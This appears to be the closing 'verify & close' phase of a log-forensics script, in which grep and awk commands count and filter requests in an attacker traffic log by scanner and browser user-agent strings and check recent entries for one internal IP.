# ─── PHASE 9: VERIFY & CLOSE ──────────────────────────────────────────────────
grep "Nikto"        attacker_traffic.log | wc -l
grep "MSIE 6.0"     attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0" | wc -l
grep -v "Nikto" attacker_traffic.log \
  | grep -v "MSIE 6.0" \
  | grep -v "Firefox/52.0" \
  | awk -F'"' '{print $6}' | sort | uniq -c | sort -rn
grep -v "Nikto" attacker_traffic.log | grep -v "MSIE 6.0" | grep -v "Firefox/52.0"
grep "192.168.199.2" access.log | tail -5